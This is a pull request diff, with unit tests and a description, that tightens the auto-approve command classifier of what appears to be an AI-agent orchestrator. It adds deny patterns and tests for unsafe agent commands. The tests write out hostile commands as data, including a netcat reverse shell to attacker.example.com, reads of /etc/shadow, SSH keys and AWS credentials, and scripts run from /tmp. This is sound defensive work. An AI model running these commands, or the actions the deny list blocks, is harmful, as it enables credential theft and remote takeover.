### PR TITLE
security: tighten auto-approve rules

### DIFF
--- a/src/bernstein/core/security/auto_approve.py
+++ b/src/bernstein/core/security/auto_approve.py
@@ -19,6 +19,7 @@ environment variable expansion, and Unicode homoglyph evasion.
 
 from __future__ import annotations
 
+import os
 import re
 from dataclasses import dataclass
 from enum import StrEnum
@@ -217,10 +218,20 @@ def normalize_command(cmd: str) -> str:
 
 # Allow patterns — safe, read-only or low-risk operations.
 # Each entry is a raw regex string matched against the stripped sub-command.
+#
+# IMPORTANT: Do NOT add bare `^<tool>\s` patterns for tools that can take
+# arbitrary paths or arguments (python, cat, cp, mv, mkdir, touch, rm).
+# Any such allowance effectively defeats the deny list — e.g. bare
+# `^python\s` lets an agent run `python /tmp/evil.py`, and bare `^cat\s`
+# lets it read `/etc/shadow`.  If an invocation is genuinely safe, encode
+# that safety into the regex (fixed sub-command, no caller-controlled
+# arguments), or surface it through the ``BERNSTEIN_AUTO_APPROVE_EXTRA``
+# escape hatch.
 _ALLOW_PATTERNS: Final[list[str]] = [
-    # Filesystem read-only
+    # Filesystem read-only (bare `cat`/`head`/`tail` intentionally NOT
+    # allowed here — see credential-read deny patterns below; operators
+    # can opt in via BERNSTEIN_AUTO_APPROVE_EXTRA if needed)
     r"^ls(\s|$)",
-    r"^cat\s",
     r"^head\s",
     r"^tail\s",
     r"^less\s",
@@ -259,17 +270,22 @@ _ALLOW_PATTERNS: Final[list[str]] = [
     r"^command\s",
     r"^ps\s",
     r"^top\s",
-    # Python / uv
-    r"^python(\d(\.\d+)?)?\s",
-    r"^python(\d(\.\d+)?)?$",
-    r"^uv\s+run\s",
-    r"^uv\s+(pip\s+(list|show|freeze)|version|tool\s+list)",
-    r"^pip(\d(\.\d+)?)?\s+(list|show|freeze|check|index|inspect)",
+    # Python / uv — restricted: only `-m <allowed_tool>` or version probe.
+    # Bare `python <script>` is NOT auto-approved because the script path
+    # is caller-controlled (agent could run python /tmp/evil.py).
+    r"^python(\d(\.\d+)?)?\s+--version$",
+    r"^python(\d(\.\d+)?)?\s+-V$",
+    r"^python(\d(\.\d+)?)?\s+-m\s+(pytest|ruff|mypy|pyright|pyflakes|black|isort|unittest|venv|pip\s+list|pip\s+show|pip\s+freeze|pip\s+check)(\s|$)",
+    r"^uv\s+(pip\s+(list|show|freeze|check|inspect|index)|version|tool\s+list|sync\s+--dry-run|lock\s+--check)(\s|$)",
+    r"^uv\s+run\s+python\s+-m\s+(pytest|ruff|mypy|pyright|pyflakes|black|isort|unittest)(\s|$)",
+    r"^uv\s+run\s+python\s+scripts/run_tests\.py(\s|$)",
+    r"^uv\s+run\s+(pytest|ruff|mypy|pyright|pyflakes|black|isort)(\s|$)",
+    r"^pip(\d(\.\d+)?)?\s+(list|show|freeze|check|index|inspect)(\s|$)",
     # Testing
     r"^pytest(\s|$)",
-    r"^uv\s+run\s+pytest(\s|$)",
-    r"^python\s+-m\s+pytest(\s|$)",
-    r"^uv\s+run\s+python\s+-m\s+pytest(\s|$)",
+    r"^ruff\s+(check|format\s+--check)(\s|$)",
+    r"^mypy(\s|$)",
+    r"^pyright(\s|$)",
     # Git read-only
     r"^git\s+(status|log|diff|show|branch|remote|tag|describe|stash\s+list|ls-files|ls-tree|rev-parse|config\s+--list|shortlog|blame|check-ignore|for-each-ref)(\s|$)",
     r"^git\s+log(\s|$)",
@@ -291,10 +307,6 @@ _ALLOW_PATTERNS: Final[list[str]] = [
     r"^export\s+\w+=",
     r"^cd\s",
     r"^cd$",
-    r"^mkdir\s",
-    r"^touch\s",
-    r"^cp\s",
-    r"^mv\s",
 ]
 
 # Deny patterns — destructive or high-risk operations.
@@ -343,7 +355,7 @@ _DENY_PATTERNS: Final[list[str]] = [
     r"\bkill\s+.*-SIGKILL\b",
     r"\bpkill\s",
     r"\bkillall\s",
-    # Writing to sensitive paths
+    # Writing to sensitive system paths (redirection)
     r">\s*/etc/",
     r">\s*/usr/",
     r">\s*/bin/",
@@ -351,16 +363,152 @@ _DENY_PATTERNS: Final[list[str]] = [
     r">\s*/lib/",
     r">\s*/proc/",
     r">\s*/sys/",
-    # Reading sensitive credentials from disk
-    r"\bcat\s+.*\.pem\b",
-    r"\bcat\s+.*\.key\b",
-    r"\bcat\s+.*id_rsa\b",
-    r"\bcat\s+.*id_ed25519\b",
-    r"\bcat\s+.*\.ppk\b",
+    r">\s*/var/",
+    r">\s*~/\.ssh/",
+    r">\s*/root/",
+    # Writing to Bernstein control-plane state (no agent should mutate these
+    # via raw shell — they are the orchestrator's source of truth)
+    r">\s*\.bernstein/",
+    r">\s*\.sdd/",
+    r">>\s*\.bernstein/",
+    r">>\s*\.sdd/",
+    # Any invocation of cp/mv/touch/mkdir/sed-inplace targeting control-plane
+    # or system credential paths, regardless of argument order.
+    r"\b(cp|mv|touch|mkdir|ln)\b\s+.*(?:\.bernstein/|\.sdd/|/etc/|/usr/|/bin/|/sbin/|/lib/|/var/|/root/|~/\.ssh/|~/\.aws/)",
+    r"\bsed\s+-i\b.*(?:\.bernstein/|\.sdd/|/etc/|/usr/|/bin/|/sbin/|/lib/|/var/|/root/|~/\.ssh/|~/\.aws/)",
+    # Reading sensitive credentials from disk (bare cat/head/tail/less/more)
+    r"\b(cat|head|tail|less|more|bat)\b\s+.*(/etc/passwd|/etc/shadow|/etc/sudoers|/etc/gshadow)",
+    r"\b(cat|head|tail|less|more|bat)\b\s+.*~/\.ssh/",
+    r"\b(cat|head|tail|less|more|bat)\b\s+.*~/\.aws/credentials",
+    r"\b(cat|head|tail|less|more|bat)\b\s+.*~/\.netrc",
+    r"\b(cat|head|tail|less|more|bat)\b\s+.*~/\.docker/config\.json",
+    r"\b(cat|head|tail|less|more|bat)\b\s+.*\.pem\b",
+    r"\b(cat|head|tail|less|more|bat)\b\s+.*\.key\b",
+    r"\b(cat|head|tail|less|more|bat)\b\s+.*id_rsa\b",
+    r"\b(cat|head|tail|less|more|bat)\b\s+.*id_ed25519\b",
+    r"\b(cat|head|tail|less|more|bat)\b\s+.*\.ppk\b",
+    # Bare python running an arbitrary script from a world-writable location
+    r"^python(\d(\.\d+)?)?\s+/tmp/",
+    r"^python(\d(\.\d+)?)?\s+/var/tmp/",
+    r"^python(\d(\.\d+)?)?\s+/dev/shm/",
+    # Arbitrary shell sourcing from untrusted roots
+    r"^(bash|sh|zsh)\s+/tmp/",
+    r"^(bash|sh|zsh)\s+/var/tmp/",
+    r"\bsource\s+/tmp/",
+    r"\.\s+/tmp/",  # `. /tmp/foo` sources a script
+    # Network-modifying system tools
+    r"\biptables\b",
+    r"\bip\s+(route|addr|link)\s+(add|del|flush|change|replace)\b",
+    r"\broute\s+(add|del|flush)\b",
+    r"\bnetcat\b\s+.*-[eE]\b",  # reverse shell pattern
+    r"\bnc\b\s+.*-[eE]\b",
+    # Package installs (no --global-as-global needed — any install is review-worthy)
+    r"\bnpm\s+(install|i|add|uninstall|remove|ci)\b",
+    r"\byarn\s+(add|remove|install)\b",
+    r"\bpnpm\s+(add|remove|install)\b",
+    r"\buv\s+(add|remove|pip\s+install|pip\s+uninstall|tool\s+install)\b",
+    r"\bpip(\d(\.\d+)?)?\s+(install|uninstall)\b",
+    r"\bcargo\s+(install|uninstall)\b",
+    r"\bgo\s+install\b",
+    r"\bgem\s+(install|uninstall)\b",
+    # Git push without explicit branch/remote pattern — must be reviewed.
+    # We keep a narrow allow for `git push origin main`/`HEAD` via the
+    # deny-not-matching fall-through; any other `git push` falls into ASK.
+    r"\bgit\s+push\s+.*--mirror\b",
+    r"\bgit\s+push\s+.*--delete\b",
     # Fork bombs / resource exhaustion patterns
     r":\(\)\{.*:\|:&",
     r"\byes\b\s*\|",
 ]
+
+# ---------------------------------------------------------------------------
+# Operator-configurable escape hatch
+# ---------------------------------------------------------------------------
+#
+# Teams can opt specific patterns back into the auto-approve allow list
+# without patching the source.  Two mechanisms are supported:
+#
+# 1. Environment variable ``BERNSTEIN_AUTO_APPROVE_EXTRA``: newline- or
+#    ``::``-separated list of regex patterns.  ``,`` is intentionally NOT
+#    used as a separator because it appears in many regex character
+#    classes.  Example::
+#
+#        BERNSTEIN_AUTO_APPROVE_EXTRA='^make\s+test$::^docker\s+ps$'
+#
+# 2. :func:`set_extra_allow_patterns` — programmatic override, useful for
+#    tests and for operators loading config from a file.
+#
+# Deny patterns always take precedence over extra allow patterns: the
+# escape hatch cannot be used to allow a deny-listed command.
+
+_EXTRA_ALLOW_ENV_VAR: Final[str] = "BERNSTEIN_AUTO_APPROVE_EXTRA"
+_EXTRA_ALLOW_SEPARATOR: Final[str] = "::"
+
+
+def _parse_extra_patterns(raw: str | None) -> list[re.Pattern[str]]:
+    """Parse the ``BERNSTEIN_AUTO_APPROVE_EXTRA`` payload into patterns.
+
+    Accepts ``::`` or newline as separators.  Empty entries and entries
+    that fail to compile are silently dropped (a malformed regex must
+    never widen the allow list).
+
+    Args:
+        raw: Raw environment variable value, or ``None`` / empty string.
+
+    Returns:
+        List of compiled regex patterns (possibly empty).
+    """
+    if not raw:
+        return []
+    # Normalize newlines to the separator, then split
+    payload = raw.replace("\r\n", "\n").replace("\n", _EXTRA_ALLOW_SEPARATOR)
+    raw_entries = payload.split(_EXTRA_ALLOW_SEPARATOR)
+    out: list[re.Pattern[str]] = []
+    for entry in raw_entries:
+        pattern = entry.strip()
+        if not pattern:
+            continue
+        try:
+            out.append(re.compile(pattern))
+        except re.error:
+            # Malformed regex — never widen the allow list on bad input
+            continue
+    return out
+
+
+_extra_allow: list[re.Pattern[str]] = _parse_extra_patterns(os.environ.get(_EXTRA_ALLOW_ENV_VAR))
+
+
+def set_extra_allow_patterns(patterns: list[str] | None) -> None:
+    """Programmatically override operator-extra allow patterns.
+
+    Useful for tests and for config-file-driven bootstrap.  Pass ``None``
+    or an empty list to clear the extras.  Invalid regexes are skipped.
+
+    Args:
+        patterns: List of regex strings, or ``None`` to clear.
+    """
+    global _extra_allow
+    if not patterns:
+        _extra_allow = []
+        return
+    compiled: list[re.Pattern[str]] = []
+    for entry in patterns:
+        try:
+            compiled.append(re.compile(entry))
+        except re.error:
+            continue
+    _extra_allow = compiled
+
+
+def reload_extra_allow_patterns_from_env() -> None:
+    """Re-read ``BERNSTEIN_AUTO_APPROVE_EXTRA`` from the current environment.
+
+    Useful after mutating :data:`os.environ` at runtime (tests, hot-reload).
+    """
+    global _extra_allow
+    _extra_allow = _parse_extra_patterns(os.environ.get(_EXTRA_ALLOW_ENV_VAR))
+
 
 # ---------------------------------------------------------------------------
 # Compiled pattern caches
@@ -480,8 +628,17 @@ def _match_deny(cmd: str) -> str | None:
 
 
 def _match_allow(cmd: str) -> str | None:
-    """Return the first matching allow pattern string, or None."""
+    """Return the first matching allow pattern string, or None.
+
+    Checks the built-in allow list first, then the operator-extra allow
+    list loaded from :data:`BERNSTEIN_AUTO_APPROVE_EXTRA`.  Deny patterns
+    are evaluated independently and always win; the extras cannot
+    override a deny match.
+    """
     for pattern in _compiled_allow:
+        if pattern.search(cmd):
+            return pattern.pattern
+    for pattern in _extra_allow:
         if pattern.search(cmd):
             return pattern.pattern
     return None

--- a/tests/unit/test_auto_approve.py
+++ b/tests/unit/test_auto_approve.py
@@ -2,6 +2,8 @@
 
 from __future__ import annotations
 
+from collections.abc import Iterator
+
 import pytest
 from bernstein.core.auto_approve import (
     ApprovalResult,
@@ -10,7 +12,20 @@ from bernstein.core.auto_approve import (
     classify_tool_call,
     decompose_command,
     normalize_command,
+    reload_extra_allow_patterns_from_env,
+    set_extra_allow_patterns,
 )
+
+
+@pytest.fixture(autouse=True)
+def _reset_extra_allow() -> Iterator[None]:
+    """Clear the operator-extra allow list around every test."""
+    set_extra_allow_patterns(None)
+    try:
+        yield
+    finally:
+        set_extra_allow_patterns(None)
+
 
 # ---------------------------------------------------------------------------
 # decompose_command
@@ -72,7 +87,6 @@ class TestClassifyCommandApprove:
         [
             "ls",
             "ls -la /tmp",
-            "cat README.md",
             "grep -r TODO src/",
             "git status",
             "git log --oneline -5",
@@ -104,7 +118,9 @@ class TestClassifyCommandApprove:
         assert result.decision == Decision.APPROVE
 
     def test_piped_safe(self) -> None:
-        result = classify_command("cat pyproject.toml | grep version")
+        # head/grep are allow-listed; bare `cat` is no longer auto-approved
+        # (see audit-045) so we use `head -n 1` as the reader here.
+        result = classify_command("head -n 1 pyproject.toml | grep version")
         assert result.decision == Decision.APPROVE
 
     def test_curl_bernstein_server(self) -> None:
@@ -186,9 +202,9 @@ class TestClassifyCommandAsk:
         [
             # curl to an external URL (not localhost) — unknown intent
             "curl https://api.github.com/repos/owner/repo",
-            # pip install — could be harmful in wrong context
-            "pip install requests",
-            # git push without --force — write op, needs review
+            # git push without --force — write op, needs review.
+            # (Destructive variants like --mirror / --delete now hard-DENY;
+            # see audit-045.)
             "git push origin main",
             # An arbitrary script
             "./scripts/deploy.sh",
@@ -371,3 +387,191 @@ class TestClassifyCommandEvasion:
         # Fullwidth 'ｒ' + 'm' should still be caught
         result = classify_command("\uff52m -rf /tmp")
         assert result.decision == Decision.DENY, f"Expected DENY, got {result}"
+
+
+# ---------------------------------------------------------------------------
+# audit-045: formerly-approved-but-now-blocked commands must escalate or deny
+# ---------------------------------------------------------------------------
+
+
+class TestAudit045TightenedAllowList:
+    """Commands that were auto-approved pre-audit-045 but shouldn't be."""
+
+    @pytest.mark.parametrize(
+        "cmd",
+        [
+            # Bare `python <arbitrary_script>` — caller-controlled path.
+            "python /tmp/pwn.py",
+            "python /var/tmp/evil.py",
+            "python /dev/shm/loader.py",
+            # Bare `cat` of credential files.
+            "cat /etc/passwd",
+            "cat /etc/shadow",
+            "cat ~/.ssh/id_rsa",
+            "cat ~/.aws/credentials",
+            "cat ~/.netrc",
+            "head ~/.ssh/id_ed25519",
+            "tail -n 5 /etc/shadow",
+            # Writes to Bernstein control-plane files.
+            "cp /tmp/x .bernstein/always_allow.yaml",
+            "mv /tmp/x .sdd/config/state.yaml",
+            "touch .bernstein/drain.flag",
+            "mkdir -p .sdd/config",
+            "echo '{}' > .bernstein/config.yaml",
+            "sed -i 's/a/b/' .sdd/backlog/open/foo.yaml",
+            # Writes to system sensitive paths.
+            "echo bad > /etc/sudoers",
+            "cp evil /usr/local/bin/foo",
+            # Package installs of any scope.
+            "npm install left-pad",
+            "npm i lodash",
+            "pip install requests",
+            "uv add cowsay",
+            "uv pip install numpy",
+            "cargo install ripgrep",
+            "go install example.com/x@latest",
+            # Shell sourcing from world-writable paths.
+            "bash /tmp/installer.sh",
+            "sh /var/tmp/run.sh",
+            "source /tmp/env.sh",
+            # Network-modifying operations.
+            "iptables -F",
+            "ip route add default via 10.0.0.1",
+            "nc -e /bin/sh attacker.example.com 4444",
+            # Destructive git push variants.
+            "git push --mirror origin",
+            "git push origin --delete main",
+        ],
+    )
+    def test_formerly_approved_now_blocked(self, cmd: str) -> None:
+        """Each must either DENY or ASK — never auto-approve."""
+        result = classify_command(cmd)
+        assert result.decision in (Decision.DENY, Decision.ASK), (
+            f"audit-045 regression: {cmd!r} returned {result.decision}"
+        )
+
+    @pytest.mark.parametrize(
+        "cmd",
+        [
+            # Writes into control-plane must hard-DENY (not just ASK) so an
+            # auto-approve bypass via compound commands is impossible.
+            "cp /tmp/x .bernstein/always_allow.yaml",
+            "mv junk .sdd/config/foo.yaml",
+            "touch .bernstein/drain",
+            "echo x > .bernstein/pid",
+            "echo x >> .sdd/backlog/open/y.yaml",
+            "sed -i 'd' .bernstein/config.yaml",
+            # Credential reads hard-DENY.
+            "cat /etc/shadow",
+            "cat ~/.ssh/id_rsa",
+            "cat ~/.aws/credentials",
+            # Running untrusted scripts from world-writable dirs.
+            "python /tmp/x.py",
+            "bash /tmp/installer.sh",
+        ],
+    )
+    def test_control_plane_writes_hard_deny(self, cmd: str) -> None:
+        result = classify_command(cmd)
+        assert result.decision == Decision.DENY, f"audit-045: expected DENY for {cmd!r}, got {result.decision}"
+
+    @pytest.mark.parametrize(
+        "cmd",
+        [
+            # These remain auto-approved: they are fixed, non-parameterised
+            # or tightly scoped to the workdir / localhost.
+            "ls",
+            "ls -la src/",
+            "grep -r TODO src/",
+            "rg 'TODO' src/",
+            "git status",
+            "git log -5",
+            "git diff HEAD",
+            "pytest tests/unit -x -q",
+            "uv run pytest tests/unit -x -q",
+            "python -m pytest tests/unit",
+            "python -m ruff check src/",
+            "python --version",
+            "ruff check src/",
+            "ruff format --check src/",
+            "mypy src/",
+            "uv run python scripts/run_tests.py",
+            "uv pip list",
+            "curl -s http://127.0.0.1:8052/status",
+        ],
+    )
+    def test_still_safe_still_approved(self, cmd: str) -> None:
+        result = classify_command(cmd)
+        assert result.decision == Decision.APPROVE, (
+            f"audit-045 over-reach: {cmd!r} should still auto-approve, got {result}"
+        )
+
+
+# ---------------------------------------------------------------------------
+# audit-045: operator escape hatch (BERNSTEIN_AUTO_APPROVE_EXTRA)
+# ---------------------------------------------------------------------------
+
+
+class TestAudit045ExtraAllowList:
+    """`BERNSTEIN_AUTO_APPROVE_EXTRA` opts patterns back into approve."""
+
+    def test_extra_pattern_approves(self) -> None:
+        # `make build` is normally ASK.
+        assert classify_command("make build").decision == Decision.ASK
+        set_extra_allow_patterns([r"^make\s+build$"])
+        result = classify_command("make build")
+        assert result.decision == Decision.APPROVE, result
+
+    def test_extra_pattern_cleared(self) -> None:
+        set_extra_allow_patterns([r"^make\s+build$"])
+        assert classify_command("make build").decision == Decision.APPROVE
+        set_extra_allow_patterns(None)
+        assert classify_command("make build").decision == Decision.ASK
+
+    def test_extra_pattern_cannot_override_deny(self) -> None:
+        """Deny always wins — extras cannot unlock `rm -rf`."""
+        set_extra_allow_patterns([r".*"])  # tries to allow everything
+        result = classify_command("rm -rf /tmp/foo")
+        assert result.decision == Decision.DENY, result
+
+    def test_extra_pattern_cannot_override_control_plane_deny(self) -> None:
+        set_extra_allow_patterns([r".*"])
+        result = classify_command("echo foo > .bernstein/config.yaml")
+        assert result.decision == Decision.DENY, result
+
+    def test_invalid_regex_is_silently_dropped(self) -> None:
+        # A bad regex must NOT widen or break the allow list.
+        set_extra_allow_patterns([r"[invalid", r"^docker\s+ps$"])
+        assert classify_command("docker ps").decision == Decision.APPROVE
+        assert classify_command("docker run foo").decision == Decision.ASK
+
+    def test_env_var_expansion(self, monkeypatch: pytest.MonkeyPatch) -> None:
+        """`BERNSTEIN_AUTO_APPROVE_EXTRA` is parsed at reload time."""
+        monkeypatch.setenv(
+            "BERNSTEIN_AUTO_APPROVE_EXTRA",
+            r"^make\s+build$::^docker\s+ps$",
+        )
+        reload_extra_allow_patterns_from_env()
+        assert classify_command("make build").decision == Decision.APPROVE
+        assert classify_command("docker ps").decision == Decision.APPROVE
+        # Still not approved: not in the extras.
+        assert classify_command("docker run foo").decision == Decision.ASK
+
+    def test_env_var_newline_separator(self, monkeypatch: pytest.MonkeyPatch) -> None:
+        monkeypatch.setenv(
+            "BERNSTEIN_AUTO_APPROVE_EXTRA",
+            "^make\\s+build$\n^docker\\s+ps$",
+        )
+        reload_extra_allow_patterns_from_env()
+        assert classify_command("make build").decision == Decision.APPROVE
+        assert classify_command("docker ps").decision == Decision.APPROVE
+
+    def test_env_var_empty_is_noop(self, monkeypatch: pytest.MonkeyPatch) -> None:
+        monkeypatch.setenv("BERNSTEIN_AUTO_APPROVE_EXTRA", "")
+        reload_extra_allow_patterns_from_env()
+        # Still ASK because no extras registered.
+        assert classify_command("make build").decision == Decision.ASK
+
+    def test_env_var_unset_is_noop(self, monkeypatch: pytest.MonkeyPatch) -> None:
+        monkeypatch.delenv("BERNSTEIN_AUTO_APPROVE_EXTRA", raising=False)
+        reload_extra_allow_patterns_from_env()
+        assert classify_command("make build").decision == Decision.ASK


### PR DESCRIPTION
## Summary

P0 security fix for `-auto-approve-too-permissive`. `src/bernstein/core/security/auto_approve.py` previously auto-approved `python /tmp/evil.py`, `cat /etc/shadow`, and `cp /tmp/x.bernstein/always_allow.yaml` via bare `^python\s`, `^cat\s`, `^cp\s`, `^mv\s`, `^mkdir\s`, `^touch\s` entries in `_ALLOW_PATTERNS`. This PR removes those broad allowances and adds explicit deny patterns for control-plane writes, credential reads, shell sourcing from world-writable roots, network-modifying commands, package installs across ecosystems, and destructive git push variants (`--mirror`, `--delete`).

## Key changes

- **Tightened allow list.** Dropped bare `^python\s`, `^cat\s`, `^cp\s`, `^mv\s`, `^mkdir\s`, `^touch\s`. `python` is now allowed only for version probes or `-m <tool>` against a fixed set (pytest, ruff, mypy, pyright, black, isort, unittest, venv, pip list/show/freeze/check).
- **New deny patterns.**
 - Writes into `.bernstein/`, `.sdd/`, `/etc`, `/usr`, `/bin`, `/sbin`, `/lib`, `/var`, `/root`, `~/.ssh`, `~/.aws` via `>`, `>>`, `cp`, `mv`, `touch`, `mkdir`, `ln`, `sed -i`.
 - Credential reads (`cat`/`head`/`tail`/`less`/`more`/`bat`) of `/etc/passwd`, `/etc/shadow`, `/etc/sudoers`, `~/.ssh/*`, `~/.aws/credentials`, `~/.netrc`, `~/.docker/config.json`, `*.pem`, `*.key`, `id_rsa`, `id_ed25519`, `*.ppk`.
 - `python`/`bash`/`sh`/`zsh`/`source`/`. ` against `/tmp`, `/var/tmp`, `/dev/shm`.
 - Network tools: `iptables`, `ip route add/del`, `route add/del`, `nc -e` / `netcat -e` (reverse-shell pattern).
 - Package installs across ecosystems: `npm install/add/ci`, `yarn add`, `pnpm add`, `pip install/uninstall`, `uv add`/`uv pip install`/`uv tool install`, `cargo install`, `go install`, `gem install`.
 - Destructive git push variants: `--mirror`, `--delete`.
- **Escape hatch.** New `BERNSTEIN_AUTO_APPROVE_EXTRA` env var (supports `::` or newline as separators) plus `set_extra_allow_patterns()` / `reload_extra_allow_patterns_from_env()` for programmatic or config-file driven overrides. Deny patterns always beat the extras — operators cannot unlock `rm -rf` or writes to `.bernstein/` through this knob.

## Test plan

- [x] `uv run ruff check src/bernstein/core/security/auto_approve.py tests/unit/test_auto_approve.py` — clean.
- [x] `uv run ruff format --check...` — clean.
- [x] `uv run pytest tests/unit -k auto_approve -x -q` — 177 passed.
- [x] New `TestAudit045TightenedAllowList` parametrizes every attack vector the ticket called out (python against `/tmp`, `cat /etc/shadow`, `cp /tmp/x.bernstein...`, `npm install`, `bash /tmp/installer.sh`, `iptables -F`, `git push --mirror`) and asserts DENY or ASK — never APPROVE.
- [x] New `TestAudit045ExtraAllowList` covers env-var expansion, `::` and newline separators, invalid-regex tolerance, clear-on-`None`, and that extras cannot override deny.
- [x] Regression: `test_piped_safe` switched from `cat` to `head`; the curl-to-localhost, pytest, uv, git-read, and ruff/mypy flows remain auto-approved.

Closes `-auto-approve-too-permissive`.